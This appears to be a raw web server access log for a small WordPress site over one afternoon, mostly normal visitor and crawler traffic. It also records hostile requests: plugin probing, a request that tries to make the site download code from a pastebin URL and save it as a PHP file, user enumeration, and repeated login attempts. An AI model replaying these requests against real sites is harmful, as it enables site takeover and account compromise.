179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 565 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45807 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 639596 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:47 +0100] "GET /favicon.ico HTTP/1.1" 200 5797 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:01:23 +0100] "GET /?page_id=10 HTTP/1.1" 200 16566 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:01:24 +0100] "GET /wp-content/uploads/2014/11/fs-4-768x431.jpg HTTP/1.1" 200 48639 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:01:24 +0100] "GET /wp-content/uploads/2014/11/fs-3-768x431.jpg HTTP/1.1" 200 44336 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:01:24 +0100] "GET /wp-content/uploads/2014/11/fs-2.jpg?w=625 HTTP/1.1" 200 5413510 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
207.200.8.182 - - [02/Feb/2020:14:27:04 +0100] "GET / HTTP/1.1" 301 3782 "-" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:05 +0100] "GET / HTTP/1.1" 200 18068 "-" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:09 +0100] "GET / HTTP/1.1" 200 18068 "-" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:10 +0100] "GET / HTTP/1.1" 200 14680 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:10 +0100] "GET /index.php HTTP/1.1" 301 394 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:11 +0100] "GET / HTTP/1.1" 200 14680 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:12 +0100] "GET /xmlrpc.php HTTP/1.1" 405 516 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:12 +0100] "GET /?feed=rss2 HTTP/1.1" 200 2260 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:13 +0100] "GET /?page_id=41 HTTP/1.1" 200 10147 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:14 +0100] "GET /?page_id=36 HTTP/1.1" 200 12920 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:16 +0100] "GET /?page_id=20 HTTP/1.1" 200 16520 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
207.200.8.182 - - [02/Feb/2020:14:27:19 +0100] "GET /?page_id=10 HTTP/1.1" 200 16648 "https://fincasandoval.com" "LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
77.75.78.161 - - [02/Feb/2020:14:28:25 +0100] "GET /robots.txt HTTP/1.1" 404 4670 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.78.161 - - [02/Feb/2020:14:28:26 +0100] "GET / HTTP/1.1" 200 17762 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
2.47.39.210 - - [02/Feb/2020:14:30:08 +0100] "GET / HTTP/1.1" 200 17720 "-" "-"
89.248.107.232 - - [02/Feb/2020:14:51:16 +0100] "POST /wp-cron.php?doing_wp_cron=1580651476.3203721046447753906250 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
62.210.254.195 - - [02/Feb/2020:14:51:16 +0100] "GET / HTTP/1.1" 200 17525 "http://fincasandoval.com" "Go-http-client/1.1"
62.210.254.195 - - [02/Feb/2020:14:51:16 +0100] "GET / HTTP/1.1" 200 17525 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:17 +0100] "GET /wp-content/plugins/strong-testimonials/templates/modern/content.css HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:18 +0100] "GET /wp-content/plugins/accessally/resource/backend/css/accessally-manage.css HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:18 +0100] "GET /wp-content/plugins/batchmove/js/batch.js HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:19 +0100] "GET /wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:20 +0100] "GET /wp-content/plugins/wp-central/readme.txt HTTP/1.1" 403 4432 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:20 +0100] "GET /wp-content/plugins/blnmrpb/log.txt HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:21 +0100] "GET /?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos HTTP/1.1" 200 17525 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:22 +0100] "GET /wp-admin/admin-post.php?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
62.210.254.195 - - [02/Feb/2020:14:51:24 +0100] "GET /wpdemos.php HTTP/1.1" 404 3443 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.59 Safari/537.36"
185.86.164.107 - - [02/Feb/2020:15:37:40 +0100] "GET /wp-login.php HTTP/1.1" 200 7045 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:15:37:40 +0100] "POST /wp-cron.php?doing_wp_cron=1580654260.3744509220123291015625 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
185.86.164.107 - - [02/Feb/2020:15:37:40 +0100] "POST /wp-login.php HTTP/1.1" 200 4633 "https://fincasandoval.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:15:45:33 +0100] "POST /wp-cron.php?doing_wp_cron=1580654733.7712891101837158203125 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
66.246.224.12 - - [02/Feb/2020:15:45:33 +0100] "GET / HTTP/1.1" 200 18199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET / HTTP/1.1" 301 3667 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET / HTTP/1.1" 200 17757 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.5 HTTP/1.1" 200 29676 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1767 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 21109 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10560 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1761 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 762 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 97523 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-content/uploads/2017/05/vs-2016.jpg HTTP/1.1" 200 25846 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:41 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45807 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:41 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 565 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:41 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:40 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 639596 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:41 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 951 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:41 +0100] "GET /favicon.ico HTTP/1.1" 200 5797 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:46 +0100] "GET /?page_id=10 HTTP/1.1" 200 16566 "https://fincasandoval.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:46 +0100] "GET /wp-content/uploads/2014/11/fs-4-300x169.jpg HTTP/1.1" 200 27729 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:46 +0100] "GET /wp-content/uploads/2014/11/fs-3-300x169.jpg HTTP/1.1" 200 25280 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:46 +0100] "GET /favicon.ico HTTP/1.1" 200 5797 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
79.148.200.249 - - [02/Feb/2020:15:49:46 +0100] "GET /wp-content/uploads/2014/11/fs-2.jpg?w=625 HTTP/1.1" 200 5413372 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
17.58.97.104 - - [02/Feb/2020:16:12:07 +0100] "GET /robots.txt HTTP/1.1" 404 4414 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.58.100.148 - - [02/Feb/2020:16:12:08 +0100] "GET /distributors/ HTTP/1.1" 404 4414 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"
89.248.107.232 - - [02/Feb/2020:16:25:15 +0100] "POST /wp-cron.php?doing_wp_cron=1580657115.8174180984497070312500 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
2.100.179.172 - - [02/Feb/2020:16:25:15 +0100] "GET / HTTP/1.1" 200 17757 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:15 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.5 HTTP/1.1" 200 29676 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:15 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 24251 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 97523 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10422 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/uploads/2017/05/vs-2016.jpg HTTP/1.1" 200 25846 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1623 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1767 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 624 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45945 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.2.5 HTTP/1.1" 200 14344 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 565 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 951 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 639734 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:25:16 +0100] "GET /favicon.ico HTTP/1.1" 200 5797 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:12 +0100] "GET / HTTP/1.1" 200 14615 "-" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:21 +0100] "GET /?page_id=36 HTTP/1.1" 200 12835 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:21 +0100] "GET /wp-content/uploads/2014/11/fs-8-1024x768.jpg HTTP/1.1" 200 111269 "https://fincasandoval.com/?page_id=36" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:32 +0100] "GET /?page_id=10 HTTP/1.1" 200 19708 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:32 +0100] "GET /wp-content/uploads/2014/11/fs-4-300x169.jpg HTTP/1.1" 200 27729 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:33 +0100] "GET /wp-content/uploads/2014/11/fs-3-300x169.jpg HTTP/1.1" 200 25142 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
2.100.179.172 - - [02/Feb/2020:16:30:32 +0100] "GET /wp-content/uploads/2014/11/fs-2.jpg?w=625 HTTP/1.1" 200 5413372 "https://fincasandoval.com/?page_id=10" "Mozilla/5.0 (Linux; Android 9; SM-T590) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
104.248.195.110 - - [02/Feb/2020:16:34:11 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "http://fincasandoval.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.248.195.110 - - [02/Feb/2020:16:34:11 +0100] "GET /?author=1 HTTP/1.1" 200 13070 "http://fincasandoval.com///?author=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.248.195.110 - - [02/Feb/2020:16:34:11 +0100] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 4433 "http://fincasandoval.com///wp-json/wp/v2/users/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.248.195.110 - - [02/Feb/2020:16:34:11 +0100] "GET /?author=2 HTTP/1.1" 404 13157 "http://fincasandoval.com///?author=2" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
201.219.218.82 - - [02/Feb/2020:16:56:07 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
89.248.107.232 - - [02/Feb/2020:16:56:07 +0100] "POST /wp-cron.php?doing_wp_cron=1580658967.8099219799041748046875 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
201.219.218.82 - - [02/Feb/2020:16:56:08 +0100] "POST /wp-login.php HTTP/1.1" 200 7562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
201.219.218.82 - - [02/Feb/2020:16:56:09 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
201.219.218.82 - - [02/Feb/2020:16:56:10 +0100] "POST /wp-login.php HTTP/1.1" 200 7445 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
52.44.119.95 - - [02/Feb/2020:16:57:22 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
52.44.119.95 - - [02/Feb/2020:16:57:23 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
142.44.240.254 - - [02/Feb/2020:17:04:31 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "http://www.fincasandoval.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.44.240.254 - - [02/Feb/2020:17:04:32 +0100] "GET /?author=1 HTTP/1.1" 301 3444 "http://www.fincasandoval.com///?author=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.44.240.254 - - [02/Feb/2020:17:04:32 +0100] "GET /?author=1 HTTP/1.1" 200 13070 "https://www.fincasandoval.com/?author=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.44.240.254 - - [02/Feb/2020:17:04:33 +0100] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 4433 "http://www.fincasandoval.com///wp-json/wp/v2/users/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.44.240.254 - - [02/Feb/2020:17:04:33 +0100] "GET /?author=2 HTTP/1.1" 301 3537 "http://www.fincasandoval.com///?author=2" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.44.240.254 - - [02/Feb/2020:17:04:34 +0100] "GET /?author=2 HTTP/1.1" 404 13157 "https://www.fincasandoval.com/?author=2" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
157.55.39.61 - - [02/Feb/2020:17:10:44 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 642876 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
137.226.113.28 - - [02/Feb/2020:17:12:08 +0100] "GET / HTTP/1.1" 301 3416 "-" "Mozilla/5.0 zgrab/0.x (compatible; Researchscan/t13rl; +http://researchscan.comsys.rwth-aachen.de)"
137.226.113.28 - - [02/Feb/2020:17:12:09 +0100] "GET / HTTP/1.1" 400 3655 "https://89.248.107.232:443/" "Mozilla/5.0 zgrab/0.x (compatible; Researchscan/t13rl; +http://researchscan.comsys.rwth-aachen.de)"
